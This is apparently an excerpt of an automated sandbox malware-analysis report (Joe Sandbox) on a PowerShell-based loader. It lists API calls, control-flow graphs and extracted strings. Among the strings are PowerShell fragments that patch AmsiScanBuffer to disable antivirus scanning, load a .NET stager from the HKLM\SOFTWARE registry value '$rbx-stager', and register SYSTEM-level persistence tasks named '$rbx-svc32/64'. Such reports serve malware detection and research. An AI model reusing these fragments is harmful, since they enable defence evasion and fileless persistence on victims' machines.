                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction ID: 2cbb33185c4f5e8043ffebbbb0389f082068871ba2ed80542e2b5667bbad0054
                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                  • Instruction Fuzzy Hash: 68E06D316016049BF7558F62E84878936F1FB88F2AF46C024CD0907351EF7DC4A9A740
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2173090476.0000000004BCD000.00000040.00000001.00020000.00000000.sdmp, Offset: 04BCD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_4bcd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f7dbb3449fbc1184a22e81f949b0e63bd6bce6b0593d4d9e16497f198ec2ba1
                                  • Instruction ID: 680ee4b9d981887b2f1a976db0f6302c34ff3cbccbed4f14f940c8bf45dde244
                                  • Opcode Fuzzy Hash: 3f7dbb3449fbc1184a22e81f949b0e63bd6bce6b0593d4d9e16497f198ec2ba1
                                  • Instruction Fuzzy Hash: 3301F7755053049BE7104E39DCC0B67BF9CEF41625F18C4ADDC090B242C278A442C7B1
                                  Memory Dump Source
                                  • Source File: 00000023.00000002.2173090476.0000000004BCD000.00000040.00000001.00020000.00000000.sdmp, Offset: 04BCD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_35_2_4bcd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 220578b190f91b565c649cf82e8cd15e813bf6ec302f773978afefc7eec6e57f
                                  • Instruction ID: 152f26fea87bcd253e4cbf5d97a6eb921c352d4a2683aef825329b39ba1880a3
                                  • Opcode Fuzzy Hash: 220578b190f91b565c649cf82e8cd15e813bf6ec302f773978afefc7eec6e57f
                                  • Instruction Fuzzy Hash: 6F01527100D3845FD7124B25DC94752BFA8DF42224F1985EBD9988F193C2696C45C771

                                  Execution Graph

                                  Execution Coverage:76.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:25.5%
                                  Total number of Nodes:102
                                  Total number of Limit Nodes:10
                                  execution_graph 239 401798 242 4017a5 FindResourceA 239->242 243 40179d ExitProcess 242->243 244 4017c5 SizeofResource 242->244 244->243 245 4017d8 244->245 245->243 246 4017e4 LockResource RegOpenKeyExW 245->246 246->243 247 40180b RegSetValueExW 246->247 247->243 248 401822 247->248 260 401868 GetProcessHeap HeapAlloc StrCpyW 248->260 252 401835 253 401674 9 API calls 252->253 254 401841 253->254 307 40112f GetCurrentProcess IsWow64Process 254->307 258 401854 258->243 320 40151a SysAllocString SysAllocString CoInitializeEx 258->320 330 401159 260->330 262 401893 263 4018c5 StrCatW StrCatW 262->263 264 40189d StrCatW 262->264 333 4019e1 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 263->333 265 40112f 2 API calls 264->265 269 4018aa StrCatW StrCatW 265->269 269->263 272 401986 6 API calls 273 4018f0 272->273 274 401986 6 API calls 273->274 275 4018fc 274->275 276 401986 6 API calls 275->276 277 401908 276->277 278 401986 6 API calls 277->278 279 401914 278->279 280 401986 6 API calls 279->280 281 401920 280->281 282 401986 6 API calls 281->282 283 40192c 282->283 284 401986 6 API calls 283->284 285 401938 284->285 286 401986 6 API calls 285->286 287 401944 286->287 288 401986 6 API calls 287->288 289 401950 288->289 290 401986 6 API calls 289->290 291 40195c 290->291 292 401986 6 API calls 291->292 293 401968 292->293 294 401986 6 API calls 293->294 295 401974 294->295 296 401986 6 API calls 295->296 297 401827 296->297 298 401674 SysAllocString SysAllocString CoInitializeEx 297->298 299 401782 298->299 300 4016a7 CoInitializeSecurity 298->300 301 401785 SysFreeString SysFreeString 299->301 302 4016c8 CoCreateInstance 300->302 303 4016bd 300->303 301->252 304 40172d CoUninitialize 302->304 305 4016ea VariantInit 302->305 303->302 303->304 304->301 305->304 308 40114e 307->308 309 4011ad 7 API calls 308->309 310 4014f0 309->310 311 401209 CoInitializeSecurity 309->311 312 4014f3 6 API calls 310->312 313 40122a CoCreateInstance 311->313 314 40121f 311->314 312->258 315 401444 CoUninitialize 313->315 316 40124c VariantInit 313->316 314->313 314->315 315->312 318 40128f 316->318 318->315 319 4013dd VariantInit VariantInit VariantInit 318->319 319->315 321 40154d CoInitializeSecurity 320->321 322 40165f SysFreeString SysFreeString 320->322 323 401563 321->323 324 40156e CoCreateInstance 321->324 322->243 323->324 326 401659 CoUninitialize 323->326 325 401590 VariantInit 324->325 324->326 327 4015d3 325->327 326->322 328 401605 VariantInit 327->328 329 40162b 327->329 328->329 329->326 353 40118e GetModuleHandleA 330->353 332 401178 332->262 356 401000 CryptAcquireContextW 333->356 336 401a37 StrStrIW 338 401a9d 336->338 337 4018d8 346 401986 lstrlenW 337->346 339 401b71 6 API calls 338->339 340 401a57 StrStrIW StrNCatW StrCatW 338->340 342 401b27 StrCatW 338->342 343 401afb StrCatW StrNCatW 338->343 345 401adf StrCatW StrCatW 338->345 339->337 340->338 341 401b41 StrCatW StrStrIW 340->341 341->338 342->338 342->341 344 401b18 StrCatW 343->344 344->342 345->344 359 40104b 346->359 348 4019af 349 4019b3 StrStrIW 348->349 350 4018e4 348->350 349->350 351 4019bf 349->351 350->272 352 4019c0 StrStrIW 351->352 352->350 352->352 354 4011aa 353->354 355 40119d GetProcAddress 353->355 354->332 355->332 357 401044 356->357 358 401028 CryptGenRandom CryptReleaseContext 356->358 357->336 357->337 358->357 360 401000 3 API calls 359->360 361 401076 360->361 361->348 361->361

                                  Callgraph

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 61 4011ad-401203 SysAllocString * 6 CoInitializeEx 62 4014f0 61->62 63 401209-40121d CoInitializeSecurity 61->63 64 4014f3-401519 SysFreeString * 6 62->64 65 40122a-401246 CoCreateInstance 63->65 66 40121f-401224 63->66 67 4014e5 65->67 68 40124c-401291 VariantInit 65->68 66->65 66->67 69 4014e8-4014ee CoUninitialize 67->69 71 4014d4 68->71 72 401297-4012ac 68->72 69->64 73 4014d7-4014e3 71->73 72->71 76 4012b2-4012c5 72->76 73->69 78 4014c6 76->78 79 4012cb-4012dd 76->79 80 4014c9-4014d2 78->80 82 4012e3-4012f0 79->82 83 4014b8 79->83 80->73 87 4012f6-401302 82->87 88 4014aa 82->88 85 4014bb-4014c4 83->85 85->80 87->88 93 401308-40131a 87->93 90 4014ad-4014b6 88->90 90->85 93->88 95 401320-401336 93->95 97 40149c 95->97 98 40133c-401352 95->98 99 40149f-4014a8 97->99 102 401358-40136a 98->102 103 40148e 98->103 99->90 106 401480 102->106 107 401370-401383 102->107 104 401491-40149a 103->104 104->99 109 401483-40148c 106->109 111 401472 107->111 112 401389-40139f 107->112 109->104 114 401475-40147e 111->114 117 401464 112->117 118 4013a5-4013b3 112->118 114->109 119 401467-401470 117->119 121 401456 118->121 122 4013b9-4013c7 118->122 119->114 124 401459-401462 121->124 122->121 126 4013cd-4013db 122->126 124->119 126->121 129 4013dd-401440 VariantInit * 3 126->129 130 401444-401446 129->130 130->124 131 401448-401454 130->131 131->124
                                  APIs
                                  • SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
                                  • SysAllocString.OLEAUT32(00402234), ref: 004011CC
                                  • SysAllocString.OLEAUT32(powershell), ref: 004011D8
                                  • SysAllocString.OLEAUT32(?), ref: 004011E0
                                  • SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                                  • SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                  • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                  • VariantInit.OLEAUT32(?), ref: 00401250
                                  • VariantInit.OLEAUT32(?), ref: 004013EA
                                  • VariantInit.OLEAUT32(?), ref: 004013F0
                                  • VariantInit.OLEAUT32(?), ref: 00401400
                                  • CoUninitialize.COMBASE ref: 004014E8
                                  • SysFreeString.OLEAUT32(?), ref: 004014FA
                                  • SysFreeString.OLEAUT32(00000000), ref: 004014FD
                                  • SysFreeString.OLEAUT32(?), ref: 00401502
                                  • SysFreeString.OLEAUT32(?), ref: 00401507
                                  • SysFreeString.OLEAUT32(?), ref: 0040150C
                                  • SysFreeString.OLEAUT32(?), ref: 00401511
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
                                  • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                  • String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
                                  • API String ID: 3960698109-3701805373
                                  • Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                                  • Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
                                  • Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                                  • Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 152 4017a5-4017bf FindResourceA 153 401862-401867 152->153 154 4017c5-4017d2 SizeofResource 152->154 155 401861 154->155 156 4017d8-4017e2 154->156 155->153 156->155 158 4017e4-401809 LockResource RegOpenKeyExW 156->158 158->155 159 40180b-401820 RegSetValueExW 158->159 159->155 160 401822-401858 call 401868 call 401674 * 2 call 40112f call 4011ad 159->160 160->155 171 40185a-40185c call 40151a 160->171 171->155
                                  APIs
                                  • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                                  • RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                                    • Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                    • Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                    • Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                                    • Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
                                    • Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
                                    • Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                                    • Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                                    • Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                                    • Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE
                                    • Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
                                    • Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
                                    • Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F
                                    • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                    • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                    • Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                    • Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                    • Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                    • Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250
                                    • Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                                    • Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                    • Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                    • Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                    • Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                    • Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
                                  • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                                  • String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$@Vu$EXE$SOFTWARE
                                  • API String ID: 2402434814-1370148629
                                  • Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                                  • Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
                                  • Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                                  • Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 191 401000-401026 CryptAcquireContextW 192 401044-40104a 191->192 193 401028-401041 CryptGenRandom CryptReleaseContext 191->193 193->192
                                  APIs
                                  • CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                                  • CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                  • CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                                  Strings
                                  • Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
                                  • API ID: Crypt$Context$AcquireRandomRelease
                                  • String ID: Microsoft Base Cryptographic Provider v1.0
                                  • API String ID: 1815803762-291530887
                                  • Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                  • Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
                                  • Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                  • Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

                                  Control-flow Graph

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                  • StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                                  • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                    • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                    • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                  • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
                                  • StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                                  Strings
                                  • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
                                  • GetProcAddress, xrefs: 00401914
                                  • AmsiScanBufferPtr, xrefs: 00401968
                                  • Get-Delegate, xrefs: 004018D8
                                  • LoadLibraryPtr, xrefs: 00401944
                                  • Kernel32Ptr, xrefs: 00401938
                                  • NativeMethods, xrefs: 00401908
                                  • OldProtect, xrefs: 00401974
                                  • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
                                  • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
                                  • LoadLibraryDelegate, xrefs: 00401920
                                  • VirtualProtectPtr, xrefs: 00401950
                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
                                  • ParameterTypes, xrefs: 004018E4
                                  • ReturnType, xrefs: 004018F0
                                  • TypeBuilder, xrefs: 004018FC
                                  • VirtualProtectDelegate, xrefs: 0040192C
                                  • AmsiPtr, xrefs: 0040195C
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
                                  • API ID: Process$Heap$AllocCurrentWow64
                                  • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                  • API String ID: 2666690646-646820343
                                  • Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                                  • Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
                                  • Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                                  • Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

                                  Control-flow Graph

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00008000,754A2EB0,00000000,00402238), ref: 004019F4
                                  • HeapAlloc.KERNEL32(00000000), ref: 00401A01
                                  • GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
                                  • HeapAlloc.KERNEL32(00000000), ref: 00401A1C
                                    • Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                                    • Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                    • Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                                  • StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
                                  • StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
                                  • StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
                                  • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
                                  • StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
                                  • StrCatW.SHLWAPI(?,?), ref: 00401AF2
                                  • StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
                                  • StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
                                  • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
                                  • StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
                                  • StrCatW.SHLWAPI(00000000,?), ref: 00401B75
                                  • StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
                                  • HeapFree.KERNEL32(00000000), ref: 00401B93
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
                                  • RtlFreeHeap.NTDLL(00000000), ref: 00401B9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                  • String ID: '+'$'+[Char]($)+'
                                  • API String ID: 3510167801-3465596256
                                  • Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                                  • Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
                                  • Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                                  • Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 133 40151a-401547 SysAllocString * 2 CoInitializeEx 134 40154d-401561 CoInitializeSecurity 133->134 135 40165f-401673 SysFreeString * 2 133->135 136 401563-401568 134->136 137 40156e-40158a CoCreateInstance 134->137 136->137 139 401659 CoUninitialize 136->139 138 401590-4015d5 VariantInit 137->138 137->139 141 4015d7-4015ec 138->141 142 40164d-401656 138->142 139->135 141->142 145 4015ee-401603 141->145 142->139 147 401644-401648 145->147 148 401605-401627 VariantInit 145->148 147->142 149 40162b-40162d 148->149 150 40163b-40163f 149->150 151 40162f-401636 149->151 150->147 151->150
                                  APIs
                                  • SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                                  • SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                  • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                  • VariantInit.OLEAUT32(?), ref: 00401594
                                  • VariantInit.OLEAUT32(?), ref: 00401609
                                  • CoUninitialize.COMBASE ref: 00401659
                                  • SysFreeString.OLEAUT32(00000000), ref: 00401666
                                  • SysFreeString.OLEAUT32(?), ref: 0040166B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
                                  • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                  • String ID: $rbx-svc32$$rbx-svc64
                                  • API String ID: 2407135876-384997928
                                  • Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                  • Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
                                  • Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                  • Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 173 401674-4016a1 SysAllocString * 2 CoInitializeEx 174 401782 173->174 175 4016a7-4016bb CoInitializeSecurity 173->175 176 401785-401797 SysFreeString * 2 174->176 177 4016c8-4016e4 CoCreateInstance 175->177 178 4016bd-4016c2 175->178 179 401777 177->179 180 4016ea-401732 VariantInit 177->180 178->177 178->179 181 40177a-401780 CoUninitialize 179->181 183 401734-40174a 180->183 184 401769 180->184 181->176 185 40176c-401775 183->185 187 40174c-401752 183->187 184->185 185->181 189 401757-401767 187->189 189->185
                                  APIs
                                  • SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
                                  • SysAllocString.OLEAUT32(0040218C), ref: 00401690
                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                                  • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                                  • VariantInit.OLEAUT32(?), ref: 004016EE
                                  • CoUninitialize.COMBASE ref: 0040177A
                                  • SysFreeString.OLEAUT32(?), ref: 0040178C
                                  • SysFreeString.OLEAUT32(00000000), ref: 0040178F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
